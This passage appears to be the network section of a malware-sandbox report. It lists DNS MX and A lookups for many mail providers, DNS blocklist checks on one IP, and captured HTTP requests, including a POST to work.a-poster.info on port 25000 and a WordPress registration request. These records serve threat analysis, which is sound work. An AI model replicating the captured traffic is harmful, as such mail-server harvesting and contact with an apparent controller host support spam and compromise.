2911 "data": "mx0.123-reg.co.uk",
2912 "type": "MX"
2913
2914
2915
2916
2917 "type": "A",
2918 "request": "mx0.123-reg.co.uk",
2919 "answers":
2920
2921 "data": "94.136.40.61",
2922 "type": "A"
2923
2924
2925 "data": "94.136.40.154",
2926 "type": "A"
2927
2928
2929 "data": "94.136.40.151",
2930 "type": "A"
2931
2932
2933 "data": "94.136.40.150",
2934 "type": "A"
2935
2936
2937 "data": "94.136.40.153",
2938 "type": "A"
2939
2940
2941 "data": "94.136.40.152",
2942 "type": "A"
2943
2944
2945
2946
2947 "type": "MX",
2948 "request": "monroecc.edu",
2949 "answers":
2950
2951 "data": "mail1.monroecc.edu",
2952 "type": "MX"
2953
2954
2955 "data": "mail2.monroecc.edu",
2956 "type": "MX"
2957
2958
2959
2960
2961 "type": "A",
2962 "request": "mail2.monroecc.edu",
2963 "answers":
2964
2965 "data": "150.160.254.109",
2966 "type": "A"
2967
2968
2969
2970
2971 "type": "MX",
2972 "request": "polk.edu",
2973 "answers":
2974
2975 "data": "polk-edu.mail.protection.outlook.com",
2976 "type": "MX"
2977
2978
2979
2980
2981 "type": "A",
2982 "request": "polk-edu.mail.protection.outlook.com",
2983 "answers":
2984
2985 "data": "104.47.33.36",
2986 "type": "A"
2987
2988
2989 "data": "104.47.32.36",
2990 "type": "A"
2991
2992
2993
2994
2995 "type": "A",
2996 "request": "work.a-poster.info",
2997 "answers":
2998
2999 "data": "37.1.206.139",
3000 "type": "A"
3001
3002
3003
3004
3005
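3006* Domains (one recorded address per name looked up during the run; an empty "ip" means no address was recorded. The list mixes large mail and web providers such as google.com, gmail.com and hotmail.com with little-known hosts, so read it as a lookup log to triage, not as a blocklist):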
3007
3008 "ip": "45.60.106.167",
3009 "domain": "cox.net"
3010
3011
3012 "ip": "40.76.4.15",
3013 "domain": "microsoft.com"
3014
3015
3016 "ip": "65.55.92.152",
3017 "domain": "mx2.hotmail.com"
3018
3019
3020 "ip": "184.168.221.59",
3021 "domain": "gotmail.org"
3022
3023
3024 "ip": "66.255.245.195",
3025 "domain": "whitehydraulics.com"
3026
3027
3028 "ip": "54.69.98.195",
3029 "domain": "address.com"
3030
3031
3032 "ip": "104.47.34.36",
3033 "domain": "vas-com.mail.protection.outlook.com"
3034
3035
3036 "ip": "213.105.9.42",
3037 "domain": "ntlworld.com"
3038
3039
3040 "ip": "104.196.248.112",
3041 "domain": "centre.edu"
3042
3043
3044 "ip": "95.128.182.188",
3045 "domain": "iksmedia.ru"
3046
3047
3048 "ip": "161.225.202.27",
3049 "domain": "smtp01.target.com"
3050
3051
3052 "ip": "212.23.88.242",
3053 "domain": "mail.utz.ru"
3054
3055
3056 "ip": "104.47.10.33",
3057 "domain": "eur.olc.protection.outlook.com"
3058
3059
3060 "ip": "125.209.238.100",
3061 "domain": "mx1.naver.com"
3062
3063
3064 "ip": "104.47.14.33",
3065 "domain": "hotmail-com.olc.protection.outlook.com"
3066
3067
3068 "ip": "195.231.241.194",
3069 "domain": "skolekom.dk"
3070
3071
3072 "ip": "46.32.240.39",
3073 "domain": "status-graphite.com"
3074
3075
3076 "ip": "213.120.69.2",
3077 "domain": "mx.lb.btinternet.com"
3078
3079
3080 "ip": "212.54.58.11",
3081 "domain": "mx.mnd.ukmail.iss.as9143.net"
3082
3083
3084 "ip": "87.236.19.4",
3085 "domain": "bardakov.ru"
3086
3087
3088 "ip": "",
3089 "domain": "222.87.245.185.bl.spamcop.net"
3090
3091
3092 "ip": "72.30.35.9",
3093 "domain": "yahoo.com"
3094
3095
3096 "ip": "211.231.108.47",
3097 "domain": "mx3.hanmail.net"
3098
3099
3100 "ip": "98.137.159.25",
3101 "domain": "mta7.am0.yahoodns.net"
3102
3103
3104 "ip": "96.114.157.80",
3105 "domain": "mx1.comcast.net"
3106
3107
3108 "ip": "104.44.194.232",
3109 "domain": "mx1.hotmail.com"
3110
3111
3112 "ip": "167.127.246.35",
3113 "domain": "vap0132.allstate.com"
3114
3115
3116 "ip": "212.23.94.123",
3117 "domain": "utz.ru"
3118
3119
3120 "ip": "94.136.40.61",
3121 "domain": "mx0.123-reg.co.uk"
3122
3123
3124 "ip": "85.10.210.244",
3125 "domain": "wedding-rnd.ru"
3126
3127
3128 "ip": "54.208.23.82",
3129 "domain": "ig.com.br"
3130
3131
3132 "ip": "66.218.87.12",
3133 "domain": "aol.com"
3134
3135
3136 "ip": "195.146.81.131",
3137 "domain": "mail.miki.ru"
3138
3139
3140 "ip": "",
3141 "domain": "222.87.245.185.dnsbl.sorbs.net"
3142
3143
3144 "ip": "77.88.21.89",
3145 "domain": "mx.yandex.net"
3146
3147
3148 "ip": "67.195.228.109",
3149 "domain": "mta5.am0.yahoodns.net"
3150
3151
3152 "ip": "148.163.156.1",
3153 "domain": "mx0a-001b2d01.pphosted.com"
3154
3155
3156 "ip": "91.195.240.87",
3157 "domain": "hillsidefamily.com"
3158
3159
3160 "ip": "68.232.149.160",
3161 "domain": "mx2.hc187824.iphmx.com"
3162
3163
3164 "ip": "151.101.194.187",
3165 "domain": "target.com"
3166
3167
3168 "ip": "148.163.158.123",
3169 "domain": "mxb-00257e01.gslb.pphosted.com"
3170
3171
3172 "ip": "46.252.18.180",
3173 "domain": "lilex-air.com"
3174
3175
3176 "ip": "205.137.77.32",
3177 "domain": "xspz10f564t.sanofi.com"
3178
3179
3180 "ip": "67.231.152.47",
3181 "domain": "mxb-000e4101.gslb.pphosted.com"
3182
3183
3184 "ip": "",
3185 "domain": "222.87.245.185.cbl.abuseat.org"
3186
3187
3188 "ip": "210.89.160.88",
3189 "domain": "naver.com"
3190
3191
3192 "ip": "91.234.98.100",
3193 "domain": "qip.ru"
3194
3195
3196 "ip": "69.252.80.75",
3197 "domain": "comcast.net"
3198
3199
3200 "ip": "",
3201 "domain": "222.87.245.185.zen.spamhaus.org"
3202
3203
3204 "ip": "104.16.120.50",
3205 "domain": "auth.riotgames.com"
3206
3207
3208 "ip": "98.136.96.73",
3209 "domain": "mx-aol.mail.gm0.yahoodns.net"
3210
3211
3212 "ip": "192.102.218.8",
3213 "domain": "barracuda.centre.edu"
3214
3215
3216 "ip": "185.5.250.137",
3217 "domain": "kvartstroy.ru"
3218
3219
3220 "ip": "80.67.18.126",
3221 "domain": "mxlb.ispgateway.de"
3222
3223
3224 "ip": "155.70.28.140",
3225 "domain": "q.com"
3226
3227
3228 "ip": "217.69.141.181",
3229 "domain": "bk.ru"
3230
3231
3232 "ip": "216.129.105.38",
3233 "domain": "mail01.mailtwo.com"
3234
3235
3236 "ip": "150.160.254.109",
3237 "domain": "mail2.monroecc.edu"
3238
3239
3240 "ip": "203.217.239.66",
3241 "domain": "hanmail.net"
3242
3243
3244 "ip": "13.88.22.160",
3245 "domain": "hillyard.com"
3246
3247
3248 "ip": "94.100.180.70",
3249 "domain": "inbox.ru"
3250
3251
3252 "ip": "104.47.53.36",
3253 "domain": "microsoft-com.mail.protection.outlook.com"
3254
3255
3256 "ip": "98.129.229.209",
3257 "domain": "moc.edu"
3258
3259
3260 "ip": "207.211.30.181",
3261 "domain": "us-smtp-inbound-1.mimecast.com"
3262
3263
3264 "ip": "149.255.58.37",
3265 "domain": "mail.janefollis.com"
3266
3267
3268 "ip": "111.202.126.109",
3269 "domain": "sohumx1.sohu.com"
3270
3271
3272 "ip": "98.136.103.23",
3273 "domain": "yahoo.com.tr"
3274
3275
3276 "ip": "62.209.51.88",
3277 "domain": "mxb-00174601.gslb.pphosted.com"
3278
3279
3280 "ip": "208.89.132.27",
3281 "domain": "mail-in-excite.roc2.bluetie.com"
3282
3283
3284 "ip": "40.112.143.140",
3285 "domain": "vas.com"
3286
3287
3288 "ip": "204.79.197.209",
3289 "domain": "hotmail.de"
3290
3291
3292 "ip": "167.206.4.79",
3293 "domain": "mx.optimum.net"
3294
3295
3296 "ip": "67.195.228.94",
3297 "domain": "mta6.am0.yahoodns.net"
3298
3299
3300 "ip": "54.69.179.234",
3301 "domain": "johnlscott.com"
3302
3303
3304 "ip": "177.153.23.241",
3305 "domain": "mx1.ig.correio.biz"
3306
3307
3308 "ip": "217.69.139.200",
3309 "domain": "mail.ru"
3310
3311
3312 "ip": "45.56.121.201",
3313 "domain": "janedwardsmkt.com"
3314
3315
3316 "ip": "213.123.20.90",
3317 "domain": "btinternet.com"
3318
3319
3320 "ip": "23.185.0.2",
3321 "domain": "earthlink.net"
3322
3323
3324 "ip": "34.95.75.127",
3325 "domain": "excite.com"
3326
3327
3328 "ip": "124.108.115.100",
3329 "domain": "netscape.net"
3330
3331
3332 "ip": "198.202.241.222",
3333 "domain": "nasd.com"
3334
3335
3336 "ip": "148.163.149.93",
3337 "domain": "mx0a-0024a201.pphosted.com"
3338
3339
3340 "ip": "104.47.41.36",
3341 "domain": "johnlscott-com.mail.protection.outlook.com"
3342
3343
3344 "ip": "216.239.32.21",
3345 "domain": "nireland.com"
3346
3347
3348 "ip": "207.69.189.231",
3349 "domain": "mx8.earthlink.net"
3350
3351
3352 "ip": "94.100.180.104",
3353 "domain": "mxs.mail.ru"
3354
3355
3356 "ip": "",
3357 "domain": "vnet.ibm.com"
3358
3359
3360 "ip": "104.47.32.36",
3361 "domain": "polk-edu.mail.protection.outlook.com"
3362
3363
3364 "ip": "74.205.140.101",
3365 "domain": "chattem.com"
3366
3367
3368 "ip": "37.1.206.139",
3369 "domain": "work.a-poster.info"
3370
3371
3372 "ip": "",
3373 "domain": "tmail.com"
3374
3375
3376 "ip": "40.112.66.25",
3377 "domain": "linklaters.com"
3378
3379
3380 "ip": "195.231.225.144",
3381 "domain": "mx10.skolekom.dk"
3382
3383
3384 "ip": "172.217.6.78",
3385 "domain": "google.com"
3386
3387
3388 "ip": "104.47.5.36",
3389 "domain": "whitehydraulics-com.mail.protection.outlook.com"
3390
3391
3392 "ip": "202.4.96.26",
3393 "domain": "spamwall.dhakacom.com"
3394
3395
3396 "ip": "221.179.177.36",
3397 "domain": "sohu.com"
3398
3399
3400 "ip": "",
3401 "domain": "rosttreid.ru"
3402
3403
3404 "ip": "172.217.164.101",
3405 "domain": "gmail.com"
3406
3407
3408 "ip": "71.6.142.100",
3409 "domain": "interwork.sdsu.edu"
3410
3411
3412 "ip": "204.79.197.209",
3413 "domain": "hotmail.it"
3414
3415
3416 "ip": "204.79.197.212",
3417 "domain": "hotmail.com"
3418
3419
3420 "ip": "",
3421 "domain": "222.87.245.185.sbl-xbl.spamhaus.org"
3422
3423
3424 "ip": "167.206.148.154",
3425 "domain": "optonline.net"
3426
3427
3428 "ip": "87.229.196.250",
3429 "domain": "mail.radugavl.ru"
3430
3431
3432 "ip": "159.153.191.239",
3433 "domain": "signin.ea.com"
3434
3435
3436 "ip": "",
3437 "domain": "randomwag.com"
3438
3439
3440 "ip": "67.231.156.236",
3441 "domain": "mxa-0009b601.gslb.pphosted.com"
3442
3443
3444 "ip": "",
3445 "domain": "bredtv.ru"
3446
3447
3448 "ip": "52.73.137.222",
3449 "domain": "cxr.mx.a.cloudfilter.net"
3450
3451
3452 "ip": "54.87.207.164",
3453 "domain": "sabre.com"
3454
3455
3456 "ip": "192.124.249.6",
3457 "domain": "polk.edu"
3458
3459
3460 "ip": "206.152.134.65",
3461 "domain": "mx.centurylink.net"
3462
3463
3464 "ip": "",
3465 "domain": "miki.ru"
3466
3467
3468 "ip": "64.188.2.228",
3469 "domain": "landmark-grpbd.com"
3470
3471
3472 "ip": "184.30.101.30",
3473 "domain": "nfm.com"
3474
3475
3476 "ip": "",
3477 "domain": "monroecc.edu"
3478
3479
3480 "ip": "72.167.238.29",
3481 "domain": "smtp.secureserver.net"
3482
3483
3484 "ip": "65.54.188.72",
3485 "domain": "mx3.hotmail.com"
3486
3487
3488 "ip": "",
3489 "domain": "intersources.net"
3490
3491
3492 "ip": "167.127.208.24",
3493 "domain": "allstate.com"
3494
3495
3496 "ip": "77.88.21.89",
3497 "domain": "mx.yandex.ru"
3498
3499
3500 "ip": "",
3501 "domain": "il.uu.net"
3502
3503
3504 "ip": "",
3505 "domain": "radugavl.ru"
3506
3507
3508 "ip": "89.175.32.82",
3509 "domain": "mail.kvartstroy.ru"
3510
3511
3512 "ip": "204.79.197.208",
3513 "domain": "hotmail.co.uk"
3514
3515
3516 "ip": "204.79.197.212",
3517 "domain": "live.it"
3518
3519
3520 "ip": "94.130.209.113",
3521 "domain": "nolive.ir"
3522
3523
3524 "ip": "152.15.47.151",
3525 "domain": "email.uncc.edu"
3526
3527
3528 "ip": "65.55.92.184",
3529 "domain": "mx4.hotmail.com"
3530
3531
3532 "ip": "149.255.58.37",
3533 "domain": "janefollis.com"
3534
3535
3536 "ip": "164.121.250.180",
3537 "domain": "johndeere.com"
3538
3539
3540
3541* Network Communication - ICMP:
3542
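3543* Network Communication - HTTP (the second and third requests put a full URL in the request line, which is apparently why "uri" shows the host followed by a second full URL; take the target from "path" and "data". The POST names port 25000 in its request line while "port" records 80):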
3544
3545 "count": 5,
3546 "body": "",
3547 "uri": "http://www.google.com/",
3548 "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)",
3549 "method": "GET",
3550 "host": "www.google.com",
3551 "version": "1.1",
3552 "path": "/",
3553 "data": "GET / HTTP/1.1\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)\r\nHost: www.google.com\r\nConnection: Keep-Alive\r\n\r\n",
3554 "port": 80
3555
3556
3557 "count": 1,
3558 "body": "",
3559 "uri": "http://nolive.ir/http://nolive.ir/wp-login.php?action=register",
3560 "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36",
3561 "method": "GET",
3562 "host": "nolive.ir",
3563 "version": "1.0",
3564 "path": "http://nolive.ir/wp-login.php?action=register",
3565 "data": "GET http://nolive.ir/wp-login.php?action=register HTTP/1.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36\r\nReferer: http://nolive.ir/wp-login.php?action=register\r\nHost: nolive.ir\r\nConnection: close\r\n\r\n",
3566 "port": 80
3567
3568
3569 "count": 1,
3570 "body": "",
3571 "uri": "http://work.a-poster.info/http://work.a-poster.info:25000/",
3572 "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
3573 "method": "POST",
3574 "host": "work.a-poster.info",
3575 "version": "1.1",
3576 "path": "http://work.a-poster.info:25000/",
3577 "data": "POST http://work.a-poster.info:25000/ HTTP/1.1\r\nConnection: close\r\nContent-Length: 21\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: work.a-poster.info\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n\r\n",
3578 "port": 80
3579
3580
3581
3582* Network Communication - SMTP:
3583
3584* Network Communication - Hosts:
3585
3586* Network Communication - IRC: